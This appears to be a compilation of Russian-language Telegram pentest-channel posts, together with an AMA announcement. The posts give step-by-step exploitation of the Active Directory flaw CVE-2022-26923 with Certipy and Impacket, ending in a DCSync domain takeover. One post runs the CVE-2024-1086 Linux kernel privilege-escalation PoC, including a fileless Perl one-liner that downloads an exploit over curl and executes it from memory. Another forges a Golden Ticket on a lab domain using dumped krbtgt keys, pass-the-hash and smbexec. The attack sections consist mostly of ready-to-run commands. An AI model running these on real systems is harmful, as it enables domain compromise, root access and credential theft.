Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:

# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10

Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer

addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'

Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:

certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:

Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:

certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:

certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:

secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #active_directory

🐧Введение в Metasploit Framework🐧

Этот материал подойдёт для тех, кто никогда не работал с Command & Control (C&C, C2) фрэймворком Metasploit или просто хочет познакомиться с ним получше💻

Здесь мы рассмотрим:
🔵Расположение фрэймворка и структуру модулей;
🔵Типы полезных нагрузок;
🔵Поставляемый вместе с фрэймворком генератор полезных нагрузок msfvenom;
🔵Работу с модулем на примере эксплойта EternalBlue;
🔵 Обработчик входящих соединений, поддерживающий нагрузки, поставляемые MSF;
🔵Возможности meterpreter;
🔵Постэксплуатационные модули;
🔵Дамп SAM и DCSync при помощи модуля Kiwi🥝

Читать: https://teletype.in/@hackerblog/metasploit
#пентест #софт

🔻Mama AMA Criminal - AMA эфир
#AMA

Что такое AMA (Ask Me Anything) эфир? Стрим, когда вы мне сможете задавать любые адекватные и даже личные вопросы в разумных рамках. Подобное уже делал уважаемый @CuriV на своем канале @pathsecure. Не реклама, если что 🌚 Формат зашёл, решил у себя устроить подобное)

⛈ Основная повестка встречи: Проект Похек, рефлексия про прошлое и будущее, ИБ-неИБ и т.д.

📆 Дата: 17 февраля (суббота), 14:00

⏺ Запись встречи будет

Буду благодарен коллегам за репост!

🌚 @poxek

Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc

PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.

PoC:

git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit

Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:

perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE

➡️ Github PoC

🌚 @poxek

Если тебе всё ещё интересен экзамен академии PortSwigger, то я выпустил исправленную версию своей работы и рассказал немного о себе 😳

Подробнее

🎫Немного о Golden Ticket🎫

Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser

Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!

Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️

Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.

Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.

Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!

apt install python3-impacket

После обновления выпустить золотой билет можно следующей командой:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:

python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username

Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:

# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass

Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!